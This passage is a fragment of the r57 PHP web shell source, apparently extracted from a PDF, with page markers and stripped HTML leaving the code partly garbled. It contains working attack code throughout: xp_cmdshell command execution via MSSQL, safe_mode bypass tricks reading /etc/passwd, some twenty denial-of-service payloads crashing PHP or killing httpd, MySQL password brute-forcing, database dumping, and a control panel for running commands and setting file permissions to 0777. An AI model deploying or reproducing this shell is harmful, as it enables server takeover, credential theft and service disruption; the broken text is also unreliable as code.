break;case 'test4':if(empty($_POST['test4_port'])) {$_POST['test4_port'] = "1433";}$db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);if($db){if(@mssql_select_db($_POST['test4_md'],$db)){@mssql_query("drop table r57_temp_table",$db);@mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db);@mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);

$res = mssql_query("select * from r57_temp_table",$db);while(($row=@mssql_fetch_row($res))){echo htmlspecialchars($row[0])."\r\n";}@mssql_query("drop table r57_temp_table",$db);}else echo "[-] ERROR! Can't select database";@mssql_close($db);}else echo "[-] ERROR! Can't connect to MSSQL server";break;case 'test5':

$temp=tempnam($dir,"fname");if (@file_exists($temp)) @unlink($temp);$extra = "-C ".$_POST['test5_file']." -X $temp";@mb_send_mail(NULL,NULL,NULL,NULL,$extra);$str = moreread($temp);echo htmlspecialchars($str);@unlink($temp);break;case 'test6':$stream = @imap_open('/etc/passwd',"","");

5/21/2018 r57

52/72

$dir_list = @imap_list($stream,trim($_POST['test6_file']),"*");for ($i = 0;$i

5/21/2018 r57

53/72

break;case 'test16':if (fopen('srpath://../../../../../../../../../../../'.$_POST['test16_file'],"a")) echo $lang[$language.'_text61'];break;case 'test17_1':@unlink('symlinkread');@symlink('a/a/a/a/a/a/','dummy');@symlink('dummy/../../../../../../../../../../../'.$_POST['test17_file'],'symlinkread');@unlink('dummy');

while (1){@symlink('.','dummy');@unlink('dummy');}break;case 'test17_2':$str='';while (strlen($str) =0){while (@count($dir) 2) {@ob_clean();@print_r($dir);}}}else {while (@count($files) 2){@ob_clean();@print_r($files);}}}break;}}if((!$safe_mode) &&($_POST['cmd']!="php_eval") &&($_POST['cmd']!="mysql_dump") &&($_POST['cmd']!="db_query") &&($_POST['cmd']!="ftp_brute") &&($_POST['cmd']!="db_brute")){$cmd_rep = ex($_POST['cmd']);if(!$unix) {echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n";}

else {echo @htmlspecialchars($cmd_rep)."\n";}}switch($_POST['cmd']){case 'dos1':function a() {a();}a();break;case 'dos2':@pack("d4294967297",2);break;case 'dos3':

5/21/2018 r57

54/72

$a = "a";@unserialize(@str_replace('1',2147483647,@serialize($a)));break;case 'dos4':$t = array(1);while (1) {$a[] = &$t;};break;case 'dos5':@dl("sqlite.so");$db = new SqliteDatabase("foo");break;case 'dos6':preg_match('/(.(?!b))*/',@str_repeat("a",10000));break;

case 'dos7':@str_replace("A",str_repeat("B",65535),str_repeat("A",65538));break;case 'dos8':@shell_exec("killall -11 httpd");break;case 'dos9':function cx(){@tempnam("/www/","../../../../../../var/tmp/cx");cx();}cx();break;case 'dos10':$a = @str_repeat ("A",438013);$b = @str_repeat ("B",951140);@wordwrap ($a,0,$b,0);break;

case 'dos11':@array_fill(1,123456789,"Infigo-IS");break;case 'dos12':@substr_compare("A","A",12345678);break;case 'dos13':@unserialize("a:2147483649:{");break;case 'dos14':$Data = @str_ireplace("\n","
",$Data);break;case 'dos15':

function toUTF($x) {return chr(($x >>6) +192) .chr(($x &63) +128);}$str1 = "";for($i=0;$i

5/21/2018 r57

55/72

echo "Msg not sent because $msg_err\n";if (@msg_receive ($msg_id,1,$msg_type,0xffffffff,$_SESSION,false,0,$msg_error)){echo "$msg\n";}else {echo "Received $msg_error fetching message\n";break;}@msg_remove_queue ($msg_id);break;case 'dos19':$url = "php://filter/read=OFF_BY_ONE./resource=/etc/passwd";@fopen($url,"r");break;case 'dos20':

$hashtable = str_repeat("A",39);$hashtable[5*4+0]=chr(0x58);$hashtable[5*4+1]=chr(0x40);$hashtable[5*4+2]=chr(0x06);$hashtable[5*4+3]=chr(0x08);$hashtable[8*4+0]=chr(0x66);$hashtable[8*4+1]=chr(0x77);$hashtable[8*4+2]=chr(0x88);$hashtable[8*4+3]=chr(0x99);$str = 'a:100000:{s:8:"AAAABBBB";a:3:{s:12:"0123456789AA";a:1:{s:12:"AAAABBBBCCCC";i:0;}s:12:"012345678AAA";i:0;s:12:"012345678BAN";i:0;}';for ($i=0;$i

5/21/2018 r57

56/72

foreach($users as $user){$sql = new my_sql();$sql->db = $_POST['db'];$sql->host = $_POST['db_server'];$sql->port = $_POST['db_port'];$sql->user = $user;$sql->pass = $user;if($sql->connect()) {echo "[+] $user:$user - success\r\n";$suc++;}}if(isset($_POST['reverse']))

{foreach($users as $user){$sql = new my_sql();$sql->db = $_POST['db'];$sql->host = $_POST['db_server'];$sql->port = $_POST['db_port'];$sql->user = $user;$sql->pass = strrev($user);if($sql->connect()) {echo "[+] $user:".strrev($user)." - success\r\n";$suc++;}}}}else if(($_POST['brute_method']=='dic') &&isset($_POST['mysql_l'])){

foreach($users as $user){$sql = new my_sql();$sql->db = $_POST['db'];$sql->host = $_POST['db_server'];$sql->port = $_POST['db_port'];$sql->user = $_POST['mysql_l'];$sql->pass = $user;if($sql->connect()) {echo "[+] ".$_POST['mysql_l'].":$user - success\r\n";$suc++;}}}echo "\r\n-------------------------------------\r\n";

$count = count($users);if(isset($_POST['reverse']) &&($_POST['brute_method']=='passwd')) {$count *= 2;}echo $lang[$language.'_text97'].$count."\r\n";echo $lang[$language.'_text98'].$suc."\r\n";}if ($_POST['cmd']=="mysql_dump"){if(isset($_POST['dif'])) {$fp = @fopen($_POST['dif_name'],"w");}$sql = new my_sql();$sql->db = $_POST['db'];$sql->host = $_POST['db_server'];$sql->port = $_POST['db_port'];$sql->user = $_POST['mysql_l'];

$sql->pass = $_POST['mysql_p'];$sql->base = $_POST['mysql_db'];if(!$sql->connect()) {echo "[-] ERROR! Can't connect to SQL server";}else if(!$sql->select_db()) {echo "[-] ERROR! Can't select database";}else if(!$sql->dump($_POST['mysql_tbl'])) {echo "[-] ERROR! Can't create dump";}else {if(empty($_POST['dif'])) {foreach($sql->dump as $v) echo $v."\r\n";}else if($fp ||@function_exists('file_put_contents')){foreach($sql->dump as $v){@fwrite($fp,$v."\r\n") or @fputs($fp,$v."\r\n") or @file_put_contents($_POST['dif

_name'],$v."\r\n");}}

5/21/2018 r57

57/72

else {echo "[-] ERROR! Can't write in dump file";}}}echo "";echo "";echo "";echo "";function div_title($title,$id){return ''.$title.'';

}function div($id){if(isset($_COOKIE[$id]) &&($_COOKIE[$id]==0)) return '';$divid=array('id5','id6','id8','id9','id10','id11','id16','id24','id25','id26','id27','id28','id29','id33','id34','id35','id37','id38');if(empty($_COOKIE[$id]) &&@in_array($id,$divid)) return '';return '';}if(!$safe_mode){echo $fs.$table_up1.div_title($lang[$language.'_text2'],'id1').$table_up2.div('i

d1').$ts;echo sr(15,"".$lang[$language.'_text3'].$arrow."",in('text','cmd',85,''));echo sr(15,"".$lang[$language.'_text4'].$arrow."",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));echo $te.''.$table_end1.$fe;}else{echo $fs.$table_up1.div_title($lang[$language.'_text28'],'id2').$table_up2.div('id2').$ts;echo sr(15,"".$lang[$language.'_text4'].$arrow."",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'

_butt6']));

echo $te.''.$table_end1.$fe;}echo $fs.$table_up1.div_title($lang[$language.'_text42'],'id3').$table_up2.div('id3').$ts;echo sr(15,"".$lang[$language.'_text43'].$arrow."",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11']));echo $te.''.$table_end1.$fe;if($safe_mode ||$open_basedir){echo $fs.$table_up1.div_title($lang[$language.'_text57'],'id4').$table_up2.div('id4').$ts;echo sr(15,"".$lang[$language.'_text58'].$arrow."",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."".$lang[$language.'_text65']."".$lang[$language.'_text66']."".ws(3)."".$lang[$language.'_text59']."".$lang[$language.'_text60']."".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13']));echo $te.''.$table_end1.$fe;}if($unix &&@function_exists('touch')){echo $fs.$table_up1.div_title($lang[$language.'_text128'],'id5').$table_up2.div(

5/21/2018 r57

58/72

'id5').$ts;echo sr(15,"".$lang[$language.'_text43'].$arrow."",in('text','file_name',40,(!empty($_POST['file_name'])?($_POST['file_name']):($dir."/r57shell.php"))).ws(4)."".$lang[$language.'_text26'].ws(2).$lang[$language.'_text59'].$arrow."".ws(2).in('text','file_name_r',40,(!empty($_POST['file_name_r'])?($_POST['file_name_r']):(""))));echo sr(15," or set Day".$arrow."",'1

234567891011121314

15161718192021222324252627

28293031'.ws(4)."Month".$arrow."".'JanuaryFebruaryMarchAprilMay

JuneJulyAugustSeptemberOctoberNovemberDecember'.ws(4)."Year".$arrow."".'

5/21/2018 r57

59/72

1998199920002001200220032004200520062007

200820092010'.ws(4)."Hour".$arrow."".'010203040506

07080910111213141516171819

2021222324'.ws(4)."Minute".$arrow."".'1234

567891011121314

5/21/2018 r57

60/72

1516171819202122232425

26272829303132333435363738

39404142434445464748495051

5253545556575859'.ws(4)."Second".$arrow."".'1

234567891011

5/21/2018 r57

61/72

1213141516171819202122

23242526272829303132333435

36373839404142434445464748

4950515253545556575859'.in('hidden','cmd',0,'touch')

.in('hidden','dir',0,$dir)

.ws(4).in('submit','submit',0,$lang[$language.'_butt1']));echo $te.''.$table_end1.$fe;}$select='';if(@function_exists('chmod')){$select .= "CHMOD";}if(@function_exists('chown')){$select .= "CHOWN";}if(@function_exists('chgrp')){$select .= "CHGRP";}if($unix &&$select){echo $fs.$table_up1.div_title($lang[$language.'_text67'],'id6').$table_up2.div('

5/21/2018 r57

62/72

id6').$ts;echo @sr(15,"".$lang[$language.'_text43'].$arrow."",in('text','param1',55,(($_POST['param1'])?($_POST['param1']):($dir."/r57shell.php"))).ws(2)."".$lang[$language.'_text68'].$arrow.""."".$select."".ws(4).in('text','param2 title="'.$lang[$language.'_text71'].'"',10,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));echo $te.''.$table_end1.$fe;}if(!$safe_mode){$aliases2 = '';

foreach ($aliases as $alias_name=>$alias_cmd){$aliases2 .= "$alias_name";}echo $fs.$table_up1.div_title($lang[$language.'_text7'],'id7').$table_up2.div('id7').$ts;echo sr(15,"".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."","".$aliases2."".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));echo $te.''.$table_end1.$fe;}echo $fs.$table_up1.div_title($lang[$language.'_text54'],'id8').$table_up2.div('id8').$ts;

echo sr(15,"".$la